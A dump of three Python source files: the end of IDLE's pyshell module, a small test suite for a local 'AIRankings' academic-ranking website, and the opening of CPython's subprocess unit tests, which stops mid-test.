if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in list(c.keys()):
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec(code, self.locals)
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec(code, self.locals)
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
parent=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print("IDLE internal error in runcode()",
file=self.tkconsole.stderr)
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print("KeyboardInterrupt", file=self.tkconsole.stderr)
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
return self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
parent=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
parent=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
parent=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python " + python_version() + " Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("window", "_Window"),
("help", "_Help"),
]
# Extend right-click context menu
rmenu_specs = OutputWindow.rmenu_specs + [
("Squeeze", "<<squeeze-current-text>>"),
]
# New classes
from idlelib.history import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
OutputWindow.__init__(self, flist, None, None)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.sys_ps1 = sys.ps1 if hasattr(sys, 'ps1') else '>>> '
self.prompt_last_line = self.sys_ps1.split('\n')[-1]
self.prompt = self.sys_ps1 # Changes when debug active
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import iomenu
self.stdin = PseudoInputFile(self, "stdin", iomenu.encoding)
self.stdout = PseudoOutputFile(self, "stdout", iomenu.encoding)
self.stderr = PseudoOutputFile(self, "stderr", iomenu.encoding)
self.console = PseudoOutputFile(self, "console", iomenu.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self.stdin
try:
# page help() text to shell.
import pydoc # import must be done here to capture i/o rebinding.
# XXX KBK 27Dec07 use text viewer someday, but must work w/o subproc
pydoc.pager = pydoc.plainpager
except:
sys.stderr = sys.__stderr__
raise
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
_stop_readline_flag = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
parent=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
debugger_r.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
self.prompt = self.sys_ps1
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = debugger_r.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
self.prompt = "[DEBUG ON]\n" + self.sys_ps1
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"Your program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
self.stop_readline()
self.canceled = True
self.closing = True
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "help", "copyright", "credits" or "license()" for more information.'
def begin(self):
self.text.mark_set("iomark", "insert")
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = ("==== No Subprocess ====\n\n" +
"WARNING: Running IDLE without a Subprocess is deprecated\n" +
"and will be removed in a later version. See Help/IDLE Help\n" +
"for details.\n\n")
sys.displayhook = rpc.displayhook
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.text.focus_force()
self.showprompt()
import tkinter
tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def stop_readline(self):
if not self.reading: # no nested mainloop to exit.
return
self._stop_readline_flag = True
self.top.quit()
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
if self._stop_readline_flag:
self._stop_readline_flag = False
return ""
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if this before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
parent=self.text)
return
from idlelib.stackviewer import StackBrowser
StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
"Callback for Run/Restart Shell Cntl-F6"
self.interp.restart_subprocess(with_cwd=True)
def showprompt(self):
self.resetoutput()
self.console.write(self.prompt)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
def write(self, s, tags=()):
if isinstance(s, str) and len(s) and max(s) > '\uffff':
# Tk doesn't support outputting non-BMP characters
# Let's assume what printed string is not very long,
# find first non-BMP character and construct informative
# UnicodeEncodeError exception.
for start, char in enumerate(s):
if char > '\uffff':
break
raise UnicodeEncodeError("UCS-2", char, start, start+1,
'Non-BMP character not supported in Tk')
try:
self.text.mark_gravity("iomark", "right")
count = OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
raise ###pass # ### 11Aug07 KBK if we are expecting exceptions
# let's find out what they are and be specific.
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
return count
def rmenu_check_cut(self):
try:
if self.text.compare('sel.first', '<', 'iomark'):
return 'disabled'
except TclError: # no selection, so the index 'sel.first' doesn't exist
return 'disabled'
return super().rmenu_check_cut()
def rmenu_check_paste(self):
if self.text.compare('insert','<','iomark'):
return 'disabled'
return super().rmenu_check_paste()
def fix_x11_paste(root):
"Make paste replace selection on x11. See issue #5124."
if root._windowingsystem == 'x11':
for cls in 'Text', 'Entry', 'Spinbox':
root.bind_class(
cls,
'<<Paste>>',
'catch {%W delete sel.first sel.last}\n' +
root.bind_class(cls, '<<Paste>>'))
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (DEPRECATED,
see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print(sys.argv)" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print(sys.argv)" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
import getopt
from platform import system
from idlelib import testing # bool value
from idlelib import macosx
global flist, root, use_subprocess
capture_warnings(True)
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error as msg:
print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
print(" Warning: running IDLE without a subprocess is deprecated.",
file=sys.stderr)
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print("No script file: ", script)
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if dir not in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not enable_edit
# Setup root. Don't break user code run in IDLE process.
# Don't change environment when testing.
if use_subprocess and not testing:
NoDefaultRoot()
root = Tk(className="Idle")
root.withdraw()
from idlelib.run import fix_scaling
fix_scaling(root)
# set application icon
icondir = os.path.join(os.path.dirname(__file__), 'Icons')
if system() == 'Windows':
iconfile = os.path.join(icondir, 'idle.ico')
root.wm_iconbitmap(default=iconfile)
else:
ext = '.png' if TkVersion >= 8.6 else '.gif'
iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext))
for size in (16, 32, 48)]
icons = [PhotoImage(master=root, file=iconfile)
for iconfile in iconfiles]
root.wm_iconphoto(True, *icons)
# start editor and/or shell windows:
fixwordbreaks(root)
fix_x11_paste(root)
flist = PyShellFileList(root)
macosx.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args[:]:
if flist.open(filename) is None:
# filename is a directory actually, disconsider it
args.remove(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosx.isAquaTk() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
else:
shell = flist.pyshell
# Handle remaining options. If any of these are set, enable_shell
# was set also, so shell must be true to reach here.
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
elif shell:
# If there is a shell window and no cmd or script in progress,
# check for problematic OS X Tk versions and print a warning
# message in the IDLE shell window; this is less intrusive
# than always opening a separate window.
tkversionwarning = macosx.tkVersionWarning(root)
if tkversionwarning:
shell.interp.runcommand("print('%s')" % tkversionwarning)
while flist.inversedict: # keep IDLE running while files are open.
root.mainloop()
root.destroy()
capture_warnings(False)
if __name__ == "__main__":
sys.modules['pyshell'] = sys.modules['__main__']
main()
capture_warnings(False) # Make sure turned off; see issue 18081
|
testsWebsite.py | import sys
import json
from http.client import HTTPConnection, HTTPException
from bs4 import BeautifulSoup
import requests
import os
from threading import Thread
from airankings import main
basedir = os.path.abspath(os.path.dirname(__file__))
venueSource = basedir + '/../app/static/ai_venues.json'
URL = ('localhost', 5000)
class TestWebsite:
# website_thread = Thread(target=main)
# website_thread.start()
@staticmethod
def get_website(get='/'):
try:
conn = HTTPConnection(URL[0], URL[1])
conn.request('GET', get)
contents = conn.getresponse().read()
except HTTPException:
sys.exit('AIRankings could not be reached. ')
try:
soup = BeautifulSoup(contents, 'html.parser')
except:
sys.exit('HTML of web page is not valid. ')
return soup
def test_conferences(self):
# Idea: checking if there are as many HTML-Elements representing Conferences as there should be
# Number of Conferences in total: 96
def iterate_through_conferences(my_dict, conference_list):
for k, v in my_dict.items():
if isinstance(v, dict):
iterate_through_conferences(v, conference_list)
continue
conference_list.append(str(k))
return conference_list
soup = self.get_website()
conferences_expected = []
with open(venueSource) as venueJson:
data = json.load(venueJson)
conferences_expected = iterate_through_conferences(data, conferences_expected)
counter = 0
conferences_on_website = soup.find_all('li', class_="pl-2")
for x in conferences_on_website:
assert counter < len(conferences_on_website)
venue_search = conferences_expected[counter]
item = x.contents[1].contents[1].contents[3].contents
actual_venue = str(item[0])
# if (venue_search == actual_venue):
assert venue_search == actual_venue
counter += 1
assert len(conferences_on_website) == len(conferences_expected)
def test_table(self):
soup = self.get_website()
result = soup.find(id="query")
assert len(result) > 0
def test_search_function(self):
session_requests = requests.session()
response = session_requests.get("http://localhost:5000/?search=andreas%20hotho&venues=core,AAAI,IJCAI,ECAI,Artificial%20Intelligence,JAIR")
website = BeautifulSoup(response.text, 'html.parser')
search_results = website.findAll('td')
assert response.status_code == 200
assert len(search_results) != 0
assert ("Andreas Hotho") in search_results[1].text
def test_shareable_overlay(self):
# there is no way of simulating a click on the share button using BeautifulSoup.
# Using selenium could fix this issue
print("Not Implemented yet!")
def test_author_pages(self):
url = 'http://localhost:5000/'
session_requests = requests.session()
r = session_requests.post(url)
url = 'http://localhost:5000/author?name=luc%20de%20raedt'
r = session_requests.get(url)
soup = BeautifulSoup(r.text, "html.parser")
assert r.status_code == 200
assert len(soup) > 0
def test_author_page_functions(self):
authorpage = self.get_website("/author?name=luc%20de%20raedt")
linkbox = authorpage.find("div", class_="col-6 border-left")
assert len(linkbox.find_all('a')) > 0
publication_table = authorpage.find("table", id='publication')
assert publication_table is not None
def test_search_by_googleid(self):
session_requests = requests.session()
response = session_requests.get("http://localhost:5000/?search=eWTzXFAAAAAJ&venues=core,AAAI,IJCAI,ECAI,Artificial%20Intelligence,JAIR")
website = BeautifulSoup(response.text, 'html.parser')
search_results = website.findAll('td')
assert response.status_code == 200
assert len(search_results) != 0
assert ("Andreas Hotho") in search_results[1].text
# website_thread.join()
|
test_subprocess.py | import unittest
from test import script_helper
from test import support
import subprocess
import sys
import signal
import io
import locale
import os
import errno
import tempfile
import time
import re
import sysconfig
import warnings
import select
import shutil
import gc
import textwrap
try:
import resource
except ImportError:
resource = None
try:
import threading
except ImportError:
threading = None
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
try:
mkstemp = tempfile.mkstemp
except AttributeError:
# tempfile.mkstemp is not available
def mkstemp():
"""Replacement for mkstemp, calling mktemp."""
fname = tempfile.mktemp()
return os.open(fname, os.O_RDWR|os.O_CREAT), fname
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdout_arg(self):
# check_output() function stderr redirected to stdout
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(FileNotFoundError, self._assert_python, pre_args,
executable="doesnotexist")
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
